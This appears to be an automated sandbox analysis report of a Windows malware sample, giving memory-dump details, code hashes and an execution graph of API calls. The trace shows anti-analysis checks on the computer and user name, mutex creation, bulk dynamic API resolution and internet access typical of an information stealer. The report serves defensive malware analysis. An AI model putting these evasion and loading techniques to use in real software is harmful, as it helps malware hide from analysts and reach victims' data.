                                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CEE95DA
                                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6CEE95FB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                                                              • Opcode ID: ed416a6dece2d1b95fcea7c4befacfeb1b7e14757b63112a2313f1dc53cb7d8f
                                                                                                                                                                                                                                              • Instruction ID: 722c5f3231f11e447da8f24cbcc866dbb1d0ddf58f624656dd4362bb2bd53bce
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed416a6dece2d1b95fcea7c4befacfeb1b7e14757b63112a2313f1dc53cb7d8f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27118172A0510CEFCB00CF99E880DDEFBB8FF59218B60419AE515D7A10D730EA55CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:5.7%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:9.3%
                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                              Total number of Limit Nodes:29
                                                                                                                                                                                                                                              execution_graph 71556 418490 71557 41849b 71556->71557 71586 402860 71557->71586 71565 4184b4 71688 40fe20 71565->71688 71569 4184c6 71693 40ffe0 lstrlen 71569->71693 71572 40ffe0 3 API calls 71573 4184ee 71572->71573 71574 40ffe0 3 API calls 71573->71574 71575 4184f5 71574->71575 71697 40ff00 71575->71697 71577 4184fe 71578 41851e OpenEventA 71577->71578 71579 418530 CloseHandle Sleep 71578->71579 71580 41855c 71578->71580 71861 4100c0 71579->71861 71583 418565 CreateEventA 71580->71583 71582 41854a OpenEventA 71582->71579 71582->71580 71701 417c10 71583->71701 71862 402360 LocalAlloc 71586->71862 71588 402871 71589 402360 11 API calls 71588->71589 71590 402887 71589->71590 71591 402360 11 API calls 71590->71591 71592 40289d 71591->71592 71593 402360 11 API calls 71592->71593 71594 4028b3 71593->71594 71595 402360 11 API calls 71594->71595 71596 4028c9 71595->71596 71597 402360 11 API calls 71596->71597 71598 4028df 71597->71598 71599 402360 11 API calls 71598->71599 71600 4028f8 71599->71600 71601 402360 11 API calls 71600->71601 71602 40290e 71601->71602 71603 402360 11 API calls 71602->71603 71604 402924 71603->71604 71605 402360 11 API calls 71604->71605 71606 40293a 71605->71606 71607 402360 11 API calls 71606->71607 71608 402950 71607->71608 71609 402360 11 API calls 71608->71609 71610 402966 71609->71610 71611 402360 11 API calls 71610->71611 71612 40297f 71611->71612 71613 402360 11 API calls 71612->71613 71614 402995 71613->71614 71615 402360 11 API calls 71614->71615 71616 4029ab 71615->71616 71617 402360 11 API calls 71616->71617 71618 4029c1 71617->71618 71619 402360 11 API calls 71618->71619 71620 4029d7 71619->71620 71621 402360 11 API calls 71620->71621 71622 4029ed 71621->71622 71623 402360 11 API calls 71622->71623 71624 402a06 71623->71624 71625 402360 11 API calls 71624->71625 71626 402a1c 71625->71626 71627 402360 11 API calls 71626->71627 71628 402a32 71627->71628 71629 402360 11 API calls 71628->71629 71630 402a48 71629->71630 71631 402360 11 API calls 71630->71631 71632 402a5e 71631->71632 71633 402360 11 API calls 71632->71633 71634 402a74 71633->71634 71635 402360 11 API calls 71634->71635 71636 402a8d 71635->71636 71637 402360 11 API calls 71636->71637 71638 402aa3 71637->71638 71639 402360 11 API calls 71638->71639 71640 402ab9 71639->71640 71641 402360 11 API calls 71640->71641 71642 402acf 71641->71642 71643 402360 11 API calls 71642->71643 71644 402ae5 71643->71644 71645 402360 11 API calls 71644->71645 71646 402afb 71645->71646 71647 402360 11 API calls 71646->71647 71648 402b14 71647->71648 71649 402360 11 API calls 71648->71649 71650 402b2a 71649->71650 71651 402360 11 API calls 71650->71651 71652 402b40 71651->71652 71653 402360 11 API calls 71652->71653 71654 402b56 71653->71654 71655 402360 11 API calls 71654->71655 71656 402b6c 71655->71656 71657 402360 11 API calls 71656->71657 71658 402b82 71657->71658 71659 402360 11 API calls 71658->71659 71660 402b9b 71659->71660 71661 402360 11 API calls 71660->71661 71662 402bb1 71661->71662 71663 402360 11 API calls 71662->71663 71664 402bc7 71663->71664 71665 4185a0 LoadLibraryA 71664->71665 71666 4187c7 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 71665->71666 71667 4185b8 GetProcAddress 71665->71667 71668 418828 GetProcAddress 71666->71668 71669 41883b 71666->71669 71672 4185db 20 API calls 71667->71672 71668->71669 71670 418844 GetProcAddress GetProcAddress 71669->71670 71671 41886f 71669->71671 71670->71671 71673 418878 GetProcAddress 71671->71673 71674 41888b 71671->71674 71672->71666 71673->71674 71675 418894 GetProcAddress 71674->71675 71676 4188a7 71674->71676 71675->71676 71677 4188b0 GetProcAddress GetProcAddress 71676->71677 71678 4184aa 71676->71678 71677->71678 71679 401050 71678->71679 71866 410260 GetProcessHeap HeapAlloc GetComputerNameA 71679->71866 71682 401088 71687 401090 CreateDCA GetDeviceCaps ReleaseDC 71682->71687 71683 401068 71868 410220 GetProcessHeap HeapAlloc GetUserNameA 71683->71868 71685 401074 strcmp 71685->71682 71686 401081 ExitProcess 71685->71686 71687->71565 71689 40fe30 71688->71689 71690 40fe4f 71689->71690 71691 40fe47 lstrcpy 71689->71691 71692 410220 GetProcessHeap HeapAlloc GetUserNameA 71690->71692 71691->71690 71692->71569 71694 41002f 71693->71694 71695 410057 71694->71695 71696 410045 lstrcpy lstrcat 71694->71696 71695->71572 71696->71695 71698 40ff16 71697->71698 71699 40ff46 71698->71699 71700 40ff3e lstrcpy 71698->71700 71699->71577 71700->71699 71702 417c32 71701->71702 71703 40fe20 lstrcpy 71702->71703 71704 417c44 71703->71704 71869 40feb0 lstrlen 71704->71869 71707 40feb0 2 API calls 71708 417cba 71707->71708 71873 402bd0 71708->71873 71716 417d9d 71717 40ff00 lstrcpy 71716->71717 71718 417db2 71717->71718 71719 40ff00 lstrcpy 71718->71719 71720 417dc1 71719->71720 71721 40ff00 lstrcpy 71720->71721 71722 417dd0 71721->71722 71723 40ff00 lstrcpy 71722->71723 71724 417e0f 71723->71724 71725 40ff00 lstrcpy 71724->71725 71726 417e1e 71725->71726 72596 40fe60 71726->72596 71729 40ffe0 3 API calls 71730 417e4b 71729->71730 71731 40ff00 lstrcpy 71730->71731 71732 417e5b 71731->71732 72600 40ff50 71732->72600 71735 40ff00 lstrcpy 71736 417e93 71735->71736 71737 417eaf InternetOpenA 71736->71737 72604 4100c0 71737->72604 71739 417ec6 InternetOpenA 71740 40fe60 lstrcpy 71739->71740 71741 417ef0 71740->71741 72605 402450 71741->72605 71745 417f14 71746 40fe60 lstrcpy 71745->71746 71747 417f2c 71746->71747 72627 404500 71747->72627 71749 417f36 72764 4127a0 71749->72764 71751 417f3e 71752 40fe20 lstrcpy 71751->71752 71753 417f72 71752->71753 71754 401120 lstrcpy 71753->71754 71755 417f8a 71754->71755 72784 405ce0 71755->72784 71757 417f94 72964 412150 71757->72964 71759 417f9c 71760 40fe20 lstrcpy 71759->71760 71761 417fc4 71760->71761 71762 401120 lstrcpy 71761->71762 71763 417fdc 71762->71763 71764 405ce0 41 API calls 71763->71764 71765 417fe6 71764->71765 72972 411fa0 71765->72972 71767 417fee 71768 401120 lstrcpy 71767->71768 71769 418002 71768->71769 72983 415660 71769->72983 71771 418007 71772 40fe60 lstrcpy 71771->71772 71773 418018 71772->71773 71774 40fe20 lstrcpy 71773->71774 71775 418035 71774->71775 73329 404c00 71775->73329 71777 41803e 71778 401120 lstrcpy 71777->71778 71779 41807e 71778->71779 73350 40e920 71779->73350 71861->71582 71863 402387 71862->71863 71864 4023eb strlen strlen strlen strlen 71862->71864 71865 402392 6 API calls 71863->71865 71864->71588 71865->71864 71865->71865 71867 40105b strcmp 71866->71867 71867->71682 71867->71683 71868->71685 71870 40feca 71869->71870 71871 40fef8 71870->71871 71872 40fef0 lstrcpy 71870->71872 71871->71707 71872->71871 71874 402360 11 API calls 71873->71874 71875 402be1 71874->71875 71876 402360 11 API calls 71875->71876 71877 402bf7 71876->71877 71878 402360 11 API calls 71877->71878 71879 402c0d 71878->71879 71880 402360 11 API calls 71879->71880 71881 402c23 71880->71881 71882 402360 11 API calls 71881->71882 71883 402c39 71882->71883 71884 402360 11 API calls 71883->71884 71885 402c4f 71884->71885 71886 402360 11 API calls 71885->71886 71887 402c68 71886->71887 71888 402360 11 API calls 71887->71888 71889 402c7e 71888->71889 71890 402360 11 API calls 71889->71890 71891 402c94 71890->71891 71892 402360 11 API calls 71891->71892 71893 402caa 71892->71893 71894 402360 11 API calls 71893->71894 71895 402cc0 71894->71895 71896 402360 11 API calls 71895->71896 71897 402cd6 71896->71897 71898 402360 11 API calls 71897->71898 71899 402cef 71898->71899 71900 402360 11 API calls 71899->71900 71901 402d05 71900->71901 71902 402360 11 API calls 71901->71902 71903 402d1b 71902->71903 71904 402360 11 API calls 71903->71904 71905 402d31 71904->71905 71906 402360 11 API calls 71905->71906 71907 402d47 71906->71907 71908 402360 11 API calls 71907->71908 71909 402d5d 71908->71909 71910 402360 11 API calls 71909->71910 71911 402d76 71910->71911 71912 402360 11 API calls 71911->71912 71913 402d8c 71912->71913 71914 402360 11 API calls 71913->71914 71915 402da2 71914->71915 71916 402360 11 API calls 71915->71916 71917 402db8 71916->71917 71918 402360 11 API calls 71917->71918 71919 402dce 71918->71919 71920 402360 11 API calls 71919->71920 71921 402de4 71920->71921 71922 402360 11 API calls 71921->71922 71923 402dfd 71922->71923 71924 402360 11 API calls 71923->71924 71925 402e13 71924->71925 71926 402360 11 API calls 71925->71926 71927 402e29 71926->71927 71928 402360 11 API calls 71927->71928 71929 402e3f 71928->71929 71930 402360 11 API calls 71929->71930 71931 402e55 71930->71931 71932 402360 11 API calls 71931->71932 71933 402e6b 71932->71933 71934 402360 11 API calls 71933->71934 71935 402e84 71934->71935 71936 402360 11 API calls 71935->71936 71937 402e9a 71936->71937 71938 402360 11 API calls 71937->71938 71939 402eb0 71938->71939 71940 402360 11 API calls 71939->71940 71941 402ec6 71940->71941 71942 402360 11 API calls 71941->71942 71943 402edc 71942->71943 71944 402360 11 API calls 71943->71944 71945 402ef2 71944->71945 71946 402360 11 API calls 71945->71946 71947 402f0b 71946->71947 71948 402360 11 API calls 71947->71948 71949 402f21 71948->71949 71950 402360 11 API calls 71949->71950 71951 402f37 71950->71951 71952 402360 11 API calls 71951->71952 71953 402f4d 71952->71953 71954 402360 11 API calls 71953->71954 71955 402f63 71954->71955 71956 402360 11 API calls 71955->71956 71957 402f79 71956->71957 71958 402360 11 API calls 71957->71958 71959 402f92 71958->71959 71960 402360 11 API calls 71959->71960 71961 402fa8 71960->71961 71962 402360 11 API calls 71961->71962 71963 402fbe 71962->71963 71964 402360 11 API calls 71963->71964 71965 402fd4 71964->71965 71966 402360 11 API calls 71965->71966 71967 402fea 71966->71967 71968 402360 11 API calls 71967->71968 71969 403000 71968->71969 71970 402360 11 API calls 71969->71970 71971 403019 71970->71971 71972 402360 11 API calls 71971->71972 71973 40302f 71972->71973 71974 402360 11 API calls 71973->71974 71975 403045 71974->71975 71976 402360 11 API calls 71975->71976 71977 40305b 71976->71977 71978 402360 11 API calls 71977->71978 71979 403071 71978->71979 71980 402360 11 API calls 71979->71980 71981 403087 71980->71981 71982 402360 11 API calls 71981->71982 71983 4030a0 71982->71983 71984 402360 11 API calls 71983->71984 71985 4030b6 71984->71985 71986 402360 11 API calls 71985->71986 71987 4030cc 71986->71987 71988 402360 11 API calls 71987->71988 71989 4030e2 71988->71989 71990 402360 11 API calls 71989->71990 71991 4030f8 71990->71991 71992 402360 11 API calls 71991->71992 71993 40310e 71992->71993 71994 402360 11 API calls 71993->71994 71995 403127 71994->71995 71996 402360 11 API calls 71995->71996 71997 40313d 71996->71997 71998 402360 11 API calls 71997->71998 71999 403153 71998->71999 72000 402360 11 API calls 71999->72000 72001 403169 72000->72001 72002 402360 11 API calls 72001->72002 72003 40317f 72002->72003 72004 402360 11 API calls 72003->72004 72005 403195 72004->72005 72006 402360 11 API calls 72005->72006 72007 4031ae 72006->72007 72008 402360 11 API calls 72007->72008 72009 4031c4 72008->72009 72010 402360 11 API calls 72009->72010 72011 4031da 72010->72011 72012 402360 11 API calls 72011->72012 72013 4031f0 72012->72013 72014 402360 11 API calls 72013->72014 72015 403206 72014->72015 72016 402360 11 API calls 72015->72016 72017 40321c 72016->72017 72018 402360 11 API calls 72017->72018 72019 403235 72018->72019 72020 402360 11 API calls 72019->72020 72021 40324b 72020->72021 72022 402360 11 API calls 72021->72022 72023 403261 72022->72023 72024 402360 11 API calls 72023->72024 72025 403277 72024->72025 72026 402360 11 API calls 72025->72026 72027 40328d 72026->72027 72028 402360 11 API calls 72027->72028 72029 4032a3 72028->72029 72030 402360 11 API calls 72029->72030 72031 4032bc 72030->72031 72032 402360 11 API calls 72031->72032 72033 4032d2 72032->72033 72034 402360 11 API calls 72033->72034 72035 4032e8 72034->72035 72036 402360 11 API calls 72035->72036 72037 4032fe 72036->72037 72038 402360 11 API calls 72037->72038 72039 403314 72038->72039 72040 402360 11 API calls 72039->72040 72041 40332a 72040->72041 72042 402360 11 API calls 72041->72042 72043 403343 72042->72043 72044 402360 11 API calls 72043->72044 72045 403359 72044->72045 72046 402360 11 API calls 72045->72046 72047 40336f 72046->72047 72048 402360 11 API calls 72047->72048 72049 403385 72048->72049 72050 402360 11 API calls 72049->72050 72051 40339b 72050->72051 72052 402360 11 API calls 72051->72052 72053 4033b1 72052->72053 72054 402360 11 API calls 72053->72054 72055 4033ca 72054->72055 72056 402360 11 API calls 72055->72056 72057 4033e0 72056->72057 72058 402360 11 API calls 72057->72058 72059 4033f6 72058->72059 72060 402360 11 API calls 72059->72060 72061 40340c 72060->72061 72062 402360 11 API calls 72061->72062 72063 403422 72062->72063 72064 402360 11 API calls 72063->72064 72065 403438 72064->72065 72066 402360 11 API calls 72065->72066 72067 403451 72066->72067 72068 402360 11 API calls 72067->72068 72069 403467 72068->72069 72070 402360 11 API calls 72069->72070 72071 40347d 72070->72071 72072 402360 11 API calls 72071->72072 72073 403493 72072->72073 72074 402360 11 API calls 72073->72074 72075 4034a9 72074->72075 72076 402360 11 API calls 72075->72076 72077 4034bf 72076->72077 72078 402360 11 API calls 72077->72078 72079 4034d8 72078->72079 72080 402360 11 API calls 72079->72080 72081 4034ee 72080->72081 72082 402360 11 API calls 72081->72082 72083 403504 72082->72083 72084 402360 11 API calls 72083->72084 72085 40351a 72084->72085 72086 402360 11 API calls 72085->72086 72087 403530 72086->72087 72088 402360 11 API calls 72087->72088 72089 403546 72088->72089 72090 402360 11 API calls 72089->72090 72091 40355f 72090->72091 72092 402360 11 API calls 72091->72092 72093 403575 72092->72093 72094 402360 11 API calls 72093->72094 72095 40358b 72094->72095 72096 402360 11 API calls 72095->72096 72097 4035a1 72096->72097 72098 402360 11 API calls 72097->72098 72099 4035b7 72098->72099 72100 402360 11 API calls 72099->72100 72101 4035cd 72100->72101 72102 402360 11 API calls 72101->72102 72103 4035e6 72102->72103 72104 402360 11 API calls 72103->72104 72105 4035fc 72104->72105 72106 402360 11 API calls 72105->72106 72107 403612 72106->72107 72108 402360 11 API calls 72107->72108 72109 403628 72108->72109 72110 402360 11 API calls 72109->72110 72111 40363e 72110->72111 72112 402360 11 API calls 72111->72112 72113 403654 72112->72113 72114 402360 11 API calls 72113->72114 72115 40366d 72114->72115 72116 402360 11 API calls 72115->72116 72117 403683 72116->72117 72118 402360 11 API calls 72117->72118 72119 403699 72118->72119 72120 402360 11 API calls 72119->72120 72121 4036af 72120->72121 72122 402360 11 API calls 72121->72122 72123 4036c5 72122->72123 72124 402360 11 API calls 72123->72124 72125 4036db 72124->72125 72126 402360 11 API calls 72125->72126 72127 4036f4 72126->72127 72128 402360 11 API calls 72127->72128 72129 40370a 72128->72129 72130 402360 11 API calls 72129->72130 72131 403720 72130->72131 72132 402360 11 API calls 72131->72132 72133 403736 72132->72133 72134 402360 11 API calls 72133->72134 72135 40374c 72134->72135 72136 402360 11 API calls 72135->72136 72137 403762 72136->72137 72138 402360 11 API calls 72137->72138 72139 40377b 72138->72139 72140 402360 11 API calls 72139->72140 72141 403791 72140->72141 72142 402360 11 API calls 72141->72142 72143 4037a7 72142->72143 72144 402360 11 API calls 72143->72144 72145 4037bd 72144->72145 72146 402360 11 API calls 72145->72146 72147 4037d3 72146->72147 72148 402360 11 API calls 72147->72148 72149 4037e9 72148->72149 72150 402360 11 API calls 72149->72150 72151 403802 72150->72151 72152 402360 11 API calls 72151->72152 72153 403818 72152->72153 72154 402360 11 API calls 72153->72154 72155 40382e 72154->72155 72156 402360 11 API calls 72155->72156 72157 403844 72156->72157 72158 402360 11 API calls 72157->72158 72159 40385a 72158->72159 72160 402360 11 API calls 72159->72160 72161 403870 72160->72161 72162 402360 11 API calls 72161->72162 72163 403889 72162->72163 72164 402360 11 API calls 72163->72164 72165 40389f 72164->72165 72166 402360 11 API calls 72165->72166 72167 4038b5 72166->72167 72168 402360 11 API calls 72167->72168 72169 4038cb 72168->72169 72170 402360 11 API calls 72169->72170 72171 4038e1 72170->72171 72172 402360 11 API calls 72171->72172 72173 4038f7 72172->72173 72174 402360 11 API calls 72173->72174 72175 403910 72174->72175 72176 402360 11 API calls 72175->72176 72177 403926 72176->72177 72178 402360 11 API calls 72177->72178 72179 40393c 72178->72179 72180 402360 11 API calls 72179->72180 72181 403952 72180->72181 72182 402360 11 API calls 72181->72182 72183 403968 72182->72183 72184 402360 11 API calls 72183->72184 72185 40397e 72184->72185 72186 402360 11 API calls 72185->72186 72187 403997 72186->72187 72188 402360 11 API calls 72187->72188 72189 4039ad 72188->72189 72190 402360 11 API calls 72189->72190 72191 4039c3 72190->72191 72192 402360 11 API calls 72191->72192 72193 4039d9 72192->72193 72194 402360 11 API calls 72193->72194 72195 4039ef 72194->72195 72196 402360 11 API calls 72195->72196 72197 403a05 72196->72197 72198 402360 11 API calls 72197->72198 72199 403a1e 72198->72199 72200 402360 11 API calls 72199->72200 72201 403a34 72200->72201 72202 402360 11 API calls 72201->72202 72203 403a4a 72202->72203 72204 402360 11 API calls 72203->72204 72205 403a60 72204->72205 72206 402360 11 API calls 72205->72206 72207 403a76 72206->72207 72208 402360 11 API calls 72207->72208 72209 403a8c 72208->72209 72210 402360 11 API calls 72209->72210 72211 403aa5 72210->72211 72212 402360 11 API calls 72211->72212 72213 403abb 72212->72213 72214 402360 11 API calls 72213->72214 72215 403ad1 72214->72215 72216 402360 11 API calls 72215->72216 72217 403ae7 72216->72217 72218 402360 11 API calls 72217->72218 72219 403afd 72218->72219 72220 402360 11 API calls 72219->72220 72221 403b13 72220->72221 72222 402360 11 API calls 72221->72222 72223 403b2c 72222->72223 72224 402360 11 API calls 72223->72224 72225 403b42 72224->72225 72226 402360 11 API calls 72225->72226 72227 403b58 72226->72227 72228 402360 11 API calls 72227->72228 72229 403b6e 72228->72229 72230 402360 11 API calls 72229->72230 72231 403b84 72230->72231 72232 402360 11 API calls 72231->72232 72233 403b9a 72232->72233 72234 402360 11 API calls 72233->72234 72235 403bb3 72234->72235 72236 402360 11 API calls 72235->72236 72237 403bc9 72236->72237 72238 402360 11 API calls 72237->72238 72239 403bdf 72238->72239 72240 402360 11 API calls 72239->72240 72241 403bf5 72240->72241 72242 402360 11 API calls 72241->72242 72243 403c0b 72242->72243 72244 402360 11 API calls 72243->72244 72245 403c21 72244->72245 72246 402360 11 API calls 72245->72246 72247 403c3a 72246->72247 72248 402360 11 API calls 72247->72248 72249 403c50 72248->72249 72250 402360 11 API calls 72249->72250 72251 403c66 72250->72251 72252 402360 11 API calls 72251->72252 72253 403c7c 72252->72253 72254 402360 11 API calls 72253->72254 72255 403c92 72254->72255 72256 402360 11 API calls 72255->72256 72257 403ca8 72256->72257 72258 402360 11 API calls 72257->72258 72259 403cc1 72258->72259 72260 402360 11 API calls 72259->72260 72261 403cd7 72260->72261 72262 402360 11 API calls 72261->72262 72263 403ced 72262->72263 72264 402360 11 API calls 72263->72264 72265 403d03 72264->72265 72266 402360 11 API calls 72265->72266 72267 403d19 72266->72267 72268 402360 11 API calls 72267->72268 72269 403d2f 72268->72269 72270 402360 11 API calls 72269->72270 72271 403d48 72270->72271 72272 402360 11 API calls 72271->72272 72273 403d5e 72272->72273 72274 402360 11 API calls 72273->72274 72275 403d74 72274->72275 72276 402360 11 API calls 72275->72276 72277 403d8a 72276->72277 72278 402360 11 API calls 72277->72278 72279 403da0 72278->72279 72280 402360 11 API calls 72279->72280 72281 403db6 72280->72281 72282 402360 11 API calls 72281->72282 72283 403dcf 72282->72283 72284 402360 11 API calls 72283->72284 72285 403de5 72284->72285 72286 402360 11 API calls 72285->72286 72287 403dfb 72286->72287 72288 402360 11 API calls 72287->72288 72289 403e11 72288->72289 72290 402360 11 API calls 72289->72290 72291 403e27 72290->72291 72292 402360 11 API calls 72291->72292 72293 403e3d 72292->72293 72294 402360 11 API calls 72293->72294 72295 403e56 72294->72295 72296 402360 11 API calls 72295->72296 72297 403e6c 72296->72297 72298 402360 11 API calls 72297->72298 72299 403e82 72298->72299 72300 402360 11 API calls 72299->72300 72301 403e98 72300->72301 72302 402360 11 API calls 72301->72302 72303 403eae 72302->72303 72304 402360 11 API calls 72303->72304 72305 403ec4 72304->72305 72306 402360 11 API calls 72305->72306 72307 403edd 72306->72307 72308 402360 11 API calls 72307->72308 72309 403ef3 72308->72309 72310 402360 11 API calls 72309->72310 72311 403f09 72310->72311 72312 402360 11 API calls 72311->72312 72313 403f1f 72312->72313 72314 402360 11 API calls 72313->72314 72315 403f35 72314->72315 72316 402360 11 API calls 72315->72316 72317 403f4b 72316->72317 72318 402360 11 API calls 72317->72318 72319 403f64 72318->72319 72320 402360 11 API calls 72319->72320 72321 403f7a 72320->72321 72322 402360 11 API calls 72321->72322 72323 403f90 72322->72323 72324 402360 11 API calls 72323->72324 72325 403fa6 72324->72325 72326 402360 11 API calls 72325->72326 72327 403fbc 72326->72327 72328 402360 11 API calls 72327->72328 72329 403fd2 72328->72329 72330 402360 11 API calls 72329->72330 72331 403feb 72330->72331 72332 402360 11 API calls 72331->72332 72333 404001 72332->72333 72334 402360 11 API calls 72333->72334 72335 404017 72334->72335 72336 402360 11 API calls 72335->72336 72337 40402d 72336->72337 72338 402360 11 API calls 72337->72338 72339 404043 72338->72339 72340 402360 11 API calls 72339->72340 72341 404059 72340->72341 72342 402360 11 API calls 72341->72342 72343 404072 72342->72343 72344 402360 11 API calls 72343->72344 72345 404088 72344->72345 72346 402360 11 API calls 72345->72346 72347 40409e 72346->72347 72348 402360 11 API calls 72347->72348 72349 4040b4 72348->72349 72350 402360 11 API calls 72349->72350 72351 4040ca 72350->72351 72352 402360 11 API calls 72351->72352 72353 4040e0 72352->72353 72354 402360 11 API calls 72353->72354 72355 4040f9 72354->72355 72356 402360 11 API calls 72355->72356 72357 40410f 72356->72357 72358 402360 11 API calls 72357->72358 72359 404125 72358->72359 72360 402360 11 API calls 72359->72360 72361 40413b 72360->72361 72362 402360 11 API calls 72361->72362 72363 404151 72362->72363 72364 402360 11 API calls 72363->72364 72365 404167 72364->72365 72366 402360 11 API calls 72365->72366 72367 404180 72366->72367 72368 402360 11 API calls 72367->72368 72369 404196 72368->72369 72370 402360 11 API calls 72369->72370 72371 4041ac 72370->72371 72372 402360 11 API calls 72371->72372 72373 4041c2 72372->72373 72374 402360 11 API calls 72373->72374 72375 4041d8 72374->72375 72376 402360 11 API calls 72375->72376 72377 4041ee 72376->72377 72378 402360 11 API calls 72377->72378 72379 404207 72378->72379 72380 402360 11 API calls 72379->72380 72381 40421d 72380->72381 72382 402360 11 API calls 72381->72382 72383 404233 72382->72383 72384 402360 11 API calls 72383->72384 72385 404249 72384->72385 72386 402360 11 API calls 72385->72386 72387 40425f 72386->72387 72388 402360 11 API calls 72387->72388 72389 404275 72388->72389 72390 402360 11 API calls 72389->72390 72391 40428e 72390->72391 72392 402360 11 API calls 72391->72392 72393 4042a4 72392->72393 72394 402360 11 API calls 72393->72394 72395 4042ba 72394->72395 72396 402360 11 API calls 72395->72396 72397 4042d0 72396->72397 72398 402360 11 API calls 72397->72398 72399 4042e6 72398->72399 72400 402360 11 API calls 72399->72400 72401 4042fc 72400->72401 72402 402360 11 API calls 72401->72402 72403 404315 72402->72403 72404 402360 11 API calls 72403->72404 72405 40432b 72404->72405 72406 402360 11 API calls 72405->72406 72407 404341 72406->72407 72408 402360 11 API calls 72407->72408 72409 404357 72408->72409 72410 402360 11 API calls 72409->72410 72411 40436d 72410->72411 72412 402360 11 API calls 72411->72412 72413 404383 72412->72413 72414 402360 11 API calls 72413->72414 72415 40439c 72414->72415 72416 402360 11 API calls 72415->72416 72417 4043b2 72416->72417 72418 402360 11 API calls 72417->72418 72419 4043c8 72418->72419 72420 402360 11 API calls 72419->72420 72421 4043de 72420->72421 72422 402360 11 API calls 72421->72422 72423 4043f4 72422->72423 72424 402360 11 API calls 72423->72424 72425 40440a 72424->72425 72426 402360 11 API calls 72425->72426 72427 404423 72426->72427 72428 4188e0 72427->72428 72429 4188ed 43 API calls 72428->72429 72430 418cfe 9 API calls 72428->72430 72429->72430 72431 418da4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72430->72431 72432 418e18 72430->72432 72431->72432 72433 418ee2 72432->72433 72434 418e25 8 API calls 72432->72434 72435 418eeb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72433->72435 72436 418f5f 72433->72436 72434->72433 72435->72436 72437 418ff9 72436->72437 72438 418f6c 6 API calls 72436->72438 72439 419006 9 API calls 72437->72439 72440 4190dc 72437->72440 72438->72437 72439->72440 72441 4190e5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72440->72441 72442 419159 72440->72442 72441->72442 72443 419162 GetProcAddress GetProcAddress 72442->72443 72444 41918d 72442->72444 72443->72444 72445 4191c1 72444->72445 72446 419196 GetProcAddress GetProcAddress 72444->72446 72447 4192b9 72445->72447 72448 4191ce 10 API calls 72445->72448 72446->72445 72449 4192c2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72447->72449 72450 41931e 72447->72450 72448->72447 72449->72450 72451 419327 GetProcAddress 72450->72451 72452 41933a 72450->72452 72451->72452 72453 419343 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72452->72453 72454 41939f 72452->72454 72453->72454 72455 417d7d 72454->72455 72456 4193a8 GetProcAddress 72454->72456 72457 401120 72455->72457 72456->72455 72458 40fe60 lstrcpy 72457->72458 72459 401149 72458->72459 72460 40fe60 lstrcpy 72459->72460 72461 40115c 72460->72461 72462 40fe60 lstrcpy 72461->72462 72463 401178 72462->72463 72464 414330 72463->72464 72465 414368 72464->72465 72466 40feb0 2 API calls 72465->72466 72467 414391 72466->72467 72468 40feb0 2 API calls 72467->72468 72469 41439e 72468->72469 72470 40feb0 2 API calls 72469->72470 72471 4143ab 72470->72471 72472 40fe20 lstrcpy 72471->72472 72473 4143b8 72472->72473 72474 40fe20 lstrcpy 72473->72474 72475 4143c9 72474->72475 72476 40fe20 lstrcpy 72475->72476 72477 4143da 72476->72477 72478 40fe20 lstrcpy 72477->72478 72479 4143ee 72478->72479 72480 40fe20 lstrcpy 72479->72480 72481 4143ff 72480->72481 72482 40fe20 lstrcpy 72481->72482 72594 414413 72482->72594 72483 402480 lstrcpy 72483->72594 72485 4024e0 lstrcpy 72485->72594 72486 414637 StrCmpCA 72486->72594 72487 4146cc StrCmpCA 72488 4152a6 72487->72488 72487->72594 72489 40ff00 lstrcpy 72488->72489 72490 4152b2 72489->72490 73624 4024e0 72490->73624 72493 40ff00 lstrcpy 72496 4152cb 72493->72496 72494 41489f StrCmpCA 72495 415197 72494->72495 72494->72594 72499 40ff00 lstrcpy 72495->72499 73627 402770 lstrcpy 